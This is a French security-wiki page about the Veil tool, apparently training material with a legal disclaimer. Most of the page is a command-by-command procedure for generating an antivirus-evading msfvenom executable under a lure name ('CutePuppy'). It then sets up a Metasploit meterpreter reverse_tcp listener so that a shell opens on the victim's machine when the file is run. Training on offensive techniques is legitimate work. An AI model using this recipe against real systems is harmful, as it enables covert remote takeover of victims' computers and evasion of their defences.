Veil

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche

🔒 Contenu de sécurité — usage encadré

Cette page décrit des techniques de sécurité offensive à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).

Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.

Fiche express
Domaine Évasion antivirus
Rôle Génération de payloads furtifs
Sortie /usr/share/veil/output/source/
Voir aussi ROOT webserver · Social Engineering Toolkit

Veil est un outil de génération de payloads intégrant des techniques d'évasion antivirus. Il s'appuie sur msfvenom pour produire un exécutable capable de passer la vérification des antivirus.

Procédure

apt-get update && apt-get install veil
veil

Dans l'interface Veil :

use 9
generate
1            # utiliser msfvenom
base name for output files > CutePuppy

Le fichier est généré dans /usr/share/veil/output/source/.

Lancer le listener

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.61
set lport 4000
exploit

Lorsque la victime lance le fichier CutePuppy, une session s'ouvre :

shell

Voir aussi